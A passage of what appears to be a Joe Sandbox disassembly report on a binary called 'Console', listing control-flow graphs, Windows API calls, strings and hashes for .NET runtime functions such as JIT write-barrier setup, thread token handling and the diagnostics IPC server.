                                                                                                                                                                                                                          • Instruction ID: 930391919ed39a26b083425ef06d02b2de43290c4e4d15063317b76e516e8df7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 44c9221177ad3e36eeb1361b3383fb672fcad465ed9e419126cd26297ef03a0e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C6C1B074A113469FE720EFA9DC45BAE7BB0BB54304F10445EE805A7398EBB59910CB72
                                                                                                                                                                                                                          Function 01084DC0 Relevance: 26.6, APIs: 5, Strings: 10, Instructions: 300memorythreadCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 901 1084dc0-1084df5 902 108519a-10851a9 call 122a940 901->902 903 1084dfb-1084e01 901->903 904 10851ae-10851bd call 122a940 902->904 903->904 905 1084e07-1084e0e 903->905 910 10851c2 call 10171f0 904->910 907 10850e0-10850f4 VirtualProtect 905->907 908 1084e14-1084e37 call 122e910 905->908 907->910 912 10850fa 907->912 917 1084e39-1084e3b 908->917 918 1084e3d 908->918 916 10851c7 call 10171f0 910->916 915 1085104-108513c call 1084da0 TlsAlloc 912->915 915->916 923 1085142-1085155 SetThreadStackGuarantee 915->923 924 10851cc-10851d3 call 1219250 916->924 922 1084e3f-1084e54 VirtualAlloc 917->922 918->922 922->916 925 1084e5a-1084e67 call 122eab0 922->925 926 1085176-1085199 call 10896b0 call fcfba0 923->926 927 1085157-108515f GetLastError 923->927 934 1084e6c-1084e90 call 14ac830 925->934 930 1085168 927->930 931 1085161-1085166 927->931 935 1085172-1085174 930->935 936 108516a-108516d 930->936 931->935 942 1084e9e-1084eab 934->942 943 1084e92-1084e99 call 122ed90 934->943 935->924 935->926 936->935 944 1084ebd 942->944 945 1084ead-1084ebb 942->945 943->942 947 1084ec2-1084eca 944->947 945->947 948 1084edc 947->948 949 1084ecc-1084eda 947->949 950 1084ee1-1084ee9 948->950 949->950 951 1084eeb-1084ef5 950->951 952 1084ef7 950->952 953 1084efc-1084f16 call 116a380 951->953 952->953 956 1084f28 953->956 957 1084f18-1084f26 953->957 958 1084f2d-1084f35 956->958 957->958 959 1084f43 958->959 960 1084f37-1084f41 958->960 961 1084f48-1084f62 call 116a380 959->961 960->961 964 1084f74 961->964 965 1084f64-1084f72 961->965 966 1084f79-1084f81 964->966 965->966 967 1084f8f 966->967 968 1084f83-1084f8d 966->968 969 1084f94-1084fae call 116a380 967->969 968->969 972 1084fc0 969->972 973 1084fb0-1084fbe 969->973 974 1084fc5-1084fcd 972->974 973->974 975 1084fdb 974->975 976 1084fcf-1084fd9 974->976 977 1084fe0-1084ffa call 116a380 975->977 976->977 980 108500c 977->980 981 1084ffc-108500a 977->981 982 1085011-1085019 980->982 981->982 983 108501b-1085025 982->983 984 1085027 982->984 985 108502c-1085046 call 116a380 983->985 984->985 988 1085058 985->988 989 1085048-1085056 985->989 990 108505d-1085065 988->990 989->990 991 1085073 990->991 992 1085067-1085071 990->992 993 1085078-1085092 call 116a380 991->993 992->993 996 10850a4 993->996 997 1085094-10850a2 993->997 998 10850a9-10850b1 996->998 997->998 999 10850cc-10850de call 116a380 998->999 1000 10850b3-10850ca call 116a380 998->1000 999->915 1000->915
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000040,7CAB6A82,00000000,?,00000000,?,00000000), ref: 01084E46
                                                                                                                                                                                                                          • VirtualProtect.KERNEL32(014AABB8,00000129,00000040,?,7CAB6A82,00000000,?,00000000,?,00000000), ref: 010850EC
                                                                                                                                                                                                                          • TlsAlloc.KERNEL32(?,?,00000000,?,00000000), ref: 0108512E
                                                                                                                                                                                                                          • SetThreadStackGuarantee.KERNEL32(?), ref: 0108514D
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,014AA6B8,?,014AACB0,?,014AAC80,?,014AAC50,?,014AABF0,?,014AAC20,?,014AABC0,?,00000000), ref: 01085157
                                                                                                                                                                                                                            • Part of subcall function 0122E910: LeaveCriticalSection.KERNEL32(03C71B78,?,00000000,7CAB6A82,00000000,00000129,00000000,01084E25,7CAB6A82,00000000), ref: 0122E98C
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • @WriteBarrierEBP, xrefs: 01085079
                                                                                                                                                                                                                          • (BYTE*)JIT_PatchedCodeLast - (BYTE*)JIT_PatchedCodeStart > (ptrdiff_t)0, xrefs: 0108519A
                                                                                                                                                                                                                          • @WriteBarrier, xrefs: 010850B8, 010850D1
                                                                                                                                                                                                                          • @WriteBarrierESI, xrefs: 01084FE1
                                                                                                                                                                                                                          • (BYTE*)JIT_PatchedCodeLast - (BYTE*)JIT_PatchedCodeStart < (ptrdiff_t)GetOsPageSize(), xrefs: 010851AE
                                                                                                                                                                                                                          • @WriteBarrierEDI, xrefs: 0108502D
                                                                                                                                                                                                                          • @WriteBarrierECX, xrefs: 01084F49
                                                                                                                                                                                                                          • @WriteBarrierEAX, xrefs: 01084EFD
                                                                                                                                                                                                                          • @WriteBarrierEBX, xrefs: 01084F95
                                                                                                                                                                                                                          • D:\a\_work\1\s\src\coreclr\vm\threads.cpp, xrefs: 010851A4, 010851B8
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AllocVirtual$CriticalErrorGuaranteeLastLeaveProtectSectionStackThread
                                                                                                                                                                                                                          • String ID: (BYTE*)JIT_PatchedCodeLast - (BYTE*)JIT_PatchedCodeStart < (ptrdiff_t)GetOsPageSize()$(BYTE*)JIT_PatchedCodeLast - (BYTE*)JIT_PatchedCodeStart > (ptrdiff_t)0$@WriteBarrier$@WriteBarrierEAX$@WriteBarrierEBP$@WriteBarrierEBX$@WriteBarrierECX$@WriteBarrierEDI$@WriteBarrierESI$D:\a\_work\1\s\src\coreclr\vm\threads.cpp
                                                                                                                                                                                                                          • API String ID: 3484155556-337905575
                                                                                                                                                                                                                          • Opcode ID: c960151dda449cdb9f6e5e2b2741c740ca1f7d953f356fc553560365953e95de
                                                                                                                                                                                                                          • Instruction ID: d5895dd6b4ec4f9c9f617d8401cd4b44cad21480baddc9934c1d7cdb960cdc14
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c960151dda449cdb9f6e5e2b2741c740ca1f7d953f356fc553560365953e95de
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2AA18AB96081025BEB64EB689C95BBA3BA6F775200B55095EF7C1CF3E4D7328808C751
                                                                                                                                                                                                                          Function 012D71E0 Relevance: 23.0, APIs: 8, Strings: 5, Instructions: 286memorythreadstringCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 1033 12d71e0-12d7219 GetCurrentThread SetThreadDescription 1035 12d721f-12d7228 1033->1035 1036 12d7586-12d7597 call 122a500 1033->1036 1035->1036 1037 12d722e-12d7235 1035->1037 1044 12d7599-12d75a7 call 122a520 1036->1044 1045 12d75aa-12d75bf call 14ab38a 1036->1045 1039 12d723b 1037->1039 1040 12d7351-12d7363 call 14ab38a 1037->1040 1043 12d7240-12d7249 call 12d8f80 1039->1043 1053 12d724f-12d7276 1043->1053 1054 12d7344-12d734b 1043->1054 1044->1045 1055 12d7278 call 1252910 1053->1055 1054->1040 1054->1043 1056 12d727d-12d727f 1055->1056 1057 12d731a 1056->1057 1058 12d7285-12d728a 1056->1058 1059 12d731f-12d7321 call 12db610 1057->1059 1058->1057 1060 12d7290-12d729e 1058->1060 1063 12d7326-12d7328 call 1252890 1059->1063 1060->1057 1062 12d72a0-12d72b1 1060->1062 1064 12d72ed-12d7302 strcmp 1062->1064 1065 12d72b3-12d72bf call 1215d50 1062->1065 1071 12d732d-12d7333 1063->1071 1066 12d7304-12d7309 1064->1066 1067 12d7366-12d7377 call 122a500 1064->1067 1065->1057 1075 12d72c1-12d72da call 1252910 1065->1075 1066->1059 1077 12d7379-12d7393 call 122a520 1067->1077 1078 12d7396-12d73a1 1067->1078 1071->1054 1074 12d7335-12d733e HeapFree 1071->1074 1074->1054 1083 12d72dc-12d72e7 1075->1083 1084 12d730b-12d7314 HeapFree 1075->1084 1077->1078 1081 12d7557-12d7568 call 122a500 1078->1081 1082 12d73a7 1078->1082 1109 12d757c-12d7581 1081->1109 1110 12d756a-12d7579 call 122a520 1081->1110 1086 12d73ae-12d73b6 1082->1086 1087 12d74ba-12d74c2 1082->1087 1088 12d74f2-12d74fa 1082->1088 1089 12d74e2-12d74e8 call 12dac10 1082->1089 1083->1084 1091 12d72e9 1083->1091 1084->1057 1095 12d73b8-12d73bb 1086->1095 1096 12d73e6-12d73f8 1086->1096 1092 12d74c4-12d74c7 1087->1092 1093 12d74d2-12d74dd call 12d85e0 1087->1093 1097 12d74fc-12d74ff 1088->1097 1098 12d7547-12d7552 call 12dafe0 1088->1098 1103 12d74ed 1089->1103 1091->1064 1092->1093 1100 12d74c9-12d74cc 1092->1100 1093->1071 1105 12d73bd-12d73c0 1095->1105 1106 12d73d6-12d73e1 call 12d7f40 1095->1106 1096->1057 1101 12d73fe-12d7445 call 12ce3a0 call 1215d50 1096->1101 1107 12d7537-12d7542 call 12db1e0 1097->1107 1108 12d7501-12d7512 call 122a500 1097->1108 1098->1071 1100->1081 1100->1093 1134 12d7447-12d747e call 14ac830 * 2 call 12db590 1101->1134 1135 12d7483-12d7489 1101->1135 1103->1071 1105->1081 1117 12d73c6-12d73d1 call 12d81b0 1105->1117 1106->1071 1107->1071 1125 12d7514-12d7523 call 122a520 1108->1125 1126 12d7526-12d7532 call 12db610 1108->1126 1109->1059 1110->1109 1117->1071 1125->1126 1126->1071 1134->1135 1136 12d748b-12d7494 HeapFree 1135->1136 1137 12d749a-12d74b5 FlushFileBuffers HeapFree 1135->1137 1136->1137 1137->1063
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetCurrentThread.KERNEL32 ref: 012D71F6
                                                                                                                                                                                                                          • SetThreadDescription.KERNELBASE ref: 012D7210
                                                                                                                                                                                                                            • Part of subcall function 01252910: ReadFile.KERNEL32(?,?,?,00000000,00000004,?,00000000,?,00000000,?,012D727D,00000014,?), ref: 0125292F
                                                                                                                                                                                                                            • Part of subcall function 01252910: GetLastError.KERNEL32(?,00000000,?,00000000,?,012D727D,00000014,?), ref: 0125293E
                                                                                                                                                                                                                            • Part of subcall function 01252910: GetOverlappedResult.KERNEL32(?,00000004,00000000,00000001,?,00000000,?,00000000,?,012D727D,00000014,?), ref: 01252955
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,00000014,?), ref: 012D7314
                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,DOTNET_IPC_V1,00000014,?), ref: 012D72F7
                                                                                                                                                                                                                            • Part of subcall function 01215D50: GetProcessHeap.KERNEL32(7CAB6A82,00000000,00000000,014B5000,000000FF,?,0122A0F5), ref: 01215D7E
                                                                                                                                                                                                                            • Part of subcall function 01215D50: RtlAllocateHeap.NTDLL(03BF0000,00000000,00000030,7CAB6A82,00000000,00000000,014B5000,000000FF,?,0122A0F5), ref: 01215D9A
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,00000014,?), ref: 012D733E
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,00000000), ref: 012D7494
                                                                                                                                                                                                                          • FlushFileBuffers.KERNEL32(?,?,00000000), ref: 012D749D
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012D74AF
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • DOTNET_IPC_V1, xrefs: 012D72F1
                                                                                                                                                                                                                          • .NET EventPipe, xrefs: 012D7204
                                                                                                                                                                                                                          • DiagnosticServer - received IPC message with command set (%d) and command id (%d), xrefs: 012D7385
                                                                                                                                                                                                                          • Received unknown request type (%d), xrefs: 012D7515, 012D756B
                                                                                                                                                                                                                          • Diagnostics IPC listener was undefined, xrefs: 012D7599
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$Free$FileThread$AllocateBuffersCurrentDescriptionErrorFlushLastOverlappedProcessReadResultstrcmp
                                                                                                                                                                                                                          • String ID: .NET EventPipe$DOTNET_IPC_V1$DiagnosticServer - received IPC message with command set (%d) and command id (%d)$Diagnostics IPC listener was undefined$Received unknown request type (%d)
                                                                                                                                                                                                                          • API String ID: 1528069343-1097641503
                                                                                                                                                                                                                          • Opcode ID: 1b1ae089613ca7555446856c254775a57a60da3593bfb636bd23441f7158f0d9
                                                                                                                                                                                                                          • Instruction ID: 52b1e947607755450165e4f03b984cc62b283c98cbd19edd9ac0435db0941c33
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1b1ae089613ca7555446856c254775a57a60da3593bfb636bd23441f7158f0d9
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A5A1F271628282ABD3209B28EC45B7FBBE9FFA4705F40451DFE8597294EB78C910C752
                                                                                                                                                                                                                          Function 01085900 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 175threadCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 1143 1085900-108593f call 122a500 1146 1085941-1085953 call 122a520 1143->1146 1147 1085956-1085966 1143->1147 1146->1147 1149 1085a48-1085a50 1147->1149 1150 108596c-108598c GetCurrentProcess GetCurrentThread OpenThreadToken 1147->1150 1151 1085a5d-1085a8a call 108c0a0 _controlfp_s 1149->1151 1152 1085a52-1085a5b call 1085b20 1149->1152 1154 108599e-10859cd GetCurrentThread DuplicateHandle 1150->1154 1155 108598e-1085998 RevertToSelf 1150->1155 1167 1085a98-1085aa9 1151->1167 1168 1085a8c-1085a96 call 108a980 1151->1168 1152->1151 1165 1085aaa call 1219530 1152->1165 1156 1085aaf-1085af5 call 10171f0 call 1086150 1154->1156 1158 10859d3-10859f1 1154->1158 1155->1154 1155->1156 1178 1085afe-1085b0d 1156->1178 1179 1085af7-1085af8 CloseHandle 1156->1179 1161 1085a3c-1085a3f 1158->1161 1162 10859f3-10859fe SetThreadToken 1158->1162 1161->1149 1169 1085a41-1085a42 CloseHandle 1161->1169 1162->1161 1166 1085a00-1085a0f call 122a500 1162->1166 1165->1156 1180 1085a11-1085a20 call 122a520 1166->1180 1181 1085a23-1085a37 call 14aa361 call 10d4ef0 1166->1181 1168->1165 1168->1167 1169->1149 1179->1178 1180->1181 1181->1161
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 0108596C
                                                                                                                                                                                                                          • GetCurrentThread.KERNEL32 ref: 0108597D
                                                                                                                                                                                                                          • OpenThreadToken.ADVAPI32(00000000), ref: 01085984
                                                                                                                                                                                                                          • RevertToSelf.ADVAPI32 ref: 0108598E
                                                                                                                                                                                                                          • GetCurrentThread.KERNEL32 ref: 010859BB
                                                                                                                                                                                                                          • DuplicateHandle.KERNELBASE(?,00000000), ref: 010859C5
                                                                                                                                                                                                                          • SetThreadToken.ADVAPI32(00000000,FFFFFFFF), ref: 010859F6
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(FFFFFFFF), ref: 01085A42
                                                                                                                                                                                                                          • _controlfp_s.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,00000300), ref: 01085A71
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • UndoRevert/SetThreadToken failed for hToken = %d, xrefs: 01085A12
                                                                                                                                                                                                                          • SetupThread managed Thread %p Thread Id = %x, xrefs: 01085945
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Thread$Current$HandleToken$CloseDuplicateOpenProcessRevertSelf_controlfp_s
                                                                                                                                                                                                                          • String ID: SetupThread managed Thread %p Thread Id = %x$UndoRevert/SetThreadToken failed for hToken = %d
                                                                                                                                                                                                                          • API String ID: 2317356610-1638468778
                                                                                                                                                                                                                          • Opcode ID: 4b10eefd5892d1b6d611e574c2bf3a5fcbe8d66271cc4fb9dfc5134d7ae485f7
                                                                                                                                                                                                                          • Instruction ID: 1e31371f0b8833742df73fc7df8ab9536ce2d86c26d2eef1675f1bbf28b705b4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4b10eefd5892d1b6d611e574c2bf3a5fcbe8d66271cc4fb9dfc5134d7ae485f7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9551D671604305AFE760AF69DC85BABBBE9EF04B11F10026DEA95E22D0EB749500C761
                                                                                                                                                                                                                          Function 012D75E0 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 172pipeCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 1187 12d75e0-12d7602 call 12d6020 1190 12d760d-12d7614 1187->1190 1191 12d7604-12d760c 1187->1191 1192 12d785f-12d7867 1190->1192 1193 12d761a-12d762a call 121ae20 1190->1193 1193->1192 1196 12d7630-12d7640 call 121ae20 1193->1196 1196->1192 1199 12d7646-12d765e CoCreateGuid call 12d8a40 1196->1199 1202 12d768b-12d7692 call 12d96c0 1199->1202 1203 12d7660-12d766a 1199->1203 1209 12d7694-12d76a1 call 12d63a0 1202->1209 1210 12d76b0-12d76b7 call 12d9700 1202->1210 1203->1202 1204 12d766c-12d7673 1203->1204 1204->1202 1206 12d7675-12d7688 call 122a520 1204->1206 1206->1202 1216 12d76a7-12d76aa 1209->1216 1217 12d7856-12d785e 1209->1217 1218 12d76bd-12d76cb call 12d6670 1210->1218 1219 12d7854 1210->1219 1216->1210 1216->1217 1221 12d76d0-12d76d2 1218->1221 1219->1217 1221->1219 1222 12d76d8-12d76e2 1221->1222 1223 12d7819-12d7823 1222->1223 1224 12d76e8 1222->1224 1223->1217 1226 12d7825-12d782c 1223->1226 1225 12d76f0-12d76ff 1224->1225 1227 12d779b-12d77a0 1225->1227 1228 12d7705-12d770e 1225->1228 1226->1217 1229 12d782e-12d7853 GetLastError call 122a520 1226->1229 1231 12d7806-12d780f 1227->1231 1232 12d77a2-12d77a8 1227->1232 1233 12d7726-12d772f 1228->1233 1234 12d7710-12d771a CloseHandle 1228->1234 1231->1225 1238 12d7815 1231->1238 1236 12d77aa-12d77b5 FlushFileBuffers 1232->1236 1237 12d77d0-12d77d6 1232->1237 1240 12d7757-12d7760 1233->1240 1241 12d7731-12d7738 1233->1241 1234->1233 1239 12d771c 1234->1239 1243 12d77b7-12d77ba DisconnectNamedPipe 1236->1243 1244 12d77c0-12d77c9 CloseHandle 1236->1244 1245 12d77d8-12d77fb CloseHandle 1237->1245 1246 12d7802 1237->1246 1238->1223 1239->1233 1240->1227 1242 12d7762-12d7791 CloseHandle 1240->1242 1247 12d773a-12d773b DisconnectNamedPipe 1241->1247 1248 12d7741-12d774d CloseHandle 1241->1248 1242->1227 1243->1244 1244->1237 1245->1246 1246->1231 1247->1248 1248->1240
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 012D6020: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000018,?,00000000,?,012DA7F8,?,00000000,?,?,?,?,?,012DACC7), ref: 012D6025
                                                                                                                                                                                                                            • Part of subcall function 012D6020: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,012DACC7,?,?,?,012D74ED), ref: 012D6073
                                                                                                                                                                                                                          • CoCreateGuid.COMBASE(0164A210,00000000,?,00000000,?,?,00000000), ref: 012D7651
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?), ref: 012D7711
                                                                                                                                                                                                                          • DisconnectNamedPipe.KERNEL32(?,?,?), ref: 012D773B
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?), ref: 012D7747
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?), ref: 012D7763
                                                                                                                                                                                                                          • FlushFileBuffers.KERNEL32(?,?,?), ref: 012D77AB
                                                                                                                                                                                                                          • DisconnectNamedPipe.KERNEL32(?,?,?), ref: 012D77BA
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • At least one Diagnostic Port failed to be configured., xrefs: 012D7675
                                                                                                                                                                                                                          • Failed to create diagnostic server thread (%d)., xrefs: 012D7835
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseHandle$DisconnectNamedPipe$BuffersCreateFileFlushGuidfreemalloc
                                                                                                                                                                                                                          • String ID: At least one Diagnostic Port failed to be configured.$Failed to create diagnostic server thread (%d).
                                                                                                                                                                                                                          • API String ID: 3534690289-1000282211
                                                                                                                                                                                                                          • Opcode ID: aa218b54ab4268969dd504499ed15f84d0a0e07dd61d524836467465c7e08e71
                                                                                                                                                                                                                          • Instruction ID: 65959385fd6e91223654bc046d49794f7bf55a0d33eb9bb8b74e1201766f7100
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aa218b54ab4268969dd504499ed15f84d0a0e07dd61d524836467465c7e08e71
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4651F4301107028FE7309F2CDD89BE67BA5FB01329F054B1CEAAA872E1D375A459DB91
                                                                                                                                                                                                                          Function 010893A0 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 228threadCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 1249 10893a0-10893de 1250 1089458-1089466 call 1089310 1249->1250 1251 10893e0-10893e7 1249->1251 1259 1089468-108947b 1250->1259 1260 108947e-1089485 1250->1260 1253 10893e9-10893f0 1251->1253 1254 10893f2-1089408 call fcfdd0 1251->1254 1253->1254 1256 108943d-1089455 call 1089310 1253->1256 1262 1089418-108941f 1254->1262 1263 108940a-1089415 CoUninitialize 1254->1263 1265 10894a0-10894ac GetCurrentThreadId 1260->1265 1266 1089487-108949d 1260->1266 1269 108942e-1089438 call fcfd40 1262->1269 1270 1089421-1089427 1262->1270 1263->1262 1267 10894ae-10894d3 1265->1267 1268 10894d6-1089509 call fcfdd0 CoInitializeEx call fcfd40 1265->1268 1276 108950e-1089510 1268->1276 1269->1256 1270->1269 1277 1089512-1089528 1276->1277 1278 1089585-108958b 1276->1278 1281 108952a-1089530 1277->1281 1282 1089532-1089551 call fcfdd0 CoUninitialize call fcfd40 1277->1282 1279 108958d-10895a2 1278->1279 1280 10895a4-10895aa 1278->1280 1283 108955c-1089563 1279->1283 1284 108967b call ff1130 1280->1284 1285 10895b0-10895b6 1280->1285 1286 1089556-1089559 1281->1286 1282->1286 1292 1089569-1089574 call 12261e0 1283->1292 1293 1089613-1089616 1283->1293 1290 1089680-10896ab call 1017c60 1284->1290 1289 10895bc 1285->1289 1285->1290 1286->1283 1289->1283 1303 10895be-10895cb call 12261e0 1292->1303 1304 1089576-1089580 1292->1304 1295 1089618-108961f 1293->1295 1296 108966f-1089676 call 10f18b0 1293->1296 1295->1296 1301 1089621-1089644 call fcfdd0 1295->1301 1296->1284 1314 1089659-108965e 1301->1314 1315 1089646 1301->1315 1311 10895cd-10895de call 10f18b0 1303->1311 1312 10895e3-108960e __acrt_iob_func call 10688f0 GetCurrentProcess TerminateProcess 1303->1312 1304->1295 1311->1312 1312->1293 1314->1284 